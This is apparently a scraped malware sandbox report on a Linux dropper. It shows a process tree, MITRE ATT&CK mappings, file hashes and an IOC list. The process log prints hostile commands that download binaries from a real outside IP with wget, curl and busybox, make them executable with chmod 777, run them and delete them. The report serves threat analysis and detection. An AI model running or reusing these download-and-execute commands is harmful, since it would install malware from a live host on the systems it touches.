rm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:1668

/usr/bin/wget
wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:1669

/usr/bin/curl
curl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Writes file to tmp directory
PID:1670

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:1671

/bin/chmod
chmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- File and Directory Permissions Modification
PID:1672

/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Executes dropped EXE
PID:1673

/bin/rm
rm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:1674

/usr/bin/wget
wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:1675

/usr/bin/curl
curl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Writes file to tmp directory
PID:1676

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:1677

/bin/chmod
chmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- File and Directory Permissions Modification
PID:1678

/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Executes dropped EXE
PID:1679

/bin/rm
rm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:1680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	1517	rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	1523	yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	1529	jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	1535	6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	1541	5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	1547	kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	1553	NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	1559	oieViux5SkcOflukQEESWqzwe8qoXmU0do
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	1565	rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	1571	I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	1577	A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	1583	SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	1589	WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	1595	8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	1601	rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	1607	yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	1613	jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	1619	kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	1625	NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	1631	oieViux5SkcOflukQEESWqzwe8qoXmU0do
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	1637	6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	1643	5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	1649	rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	1655	SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	1661	WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	1667	8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	1673	I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	1679	A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads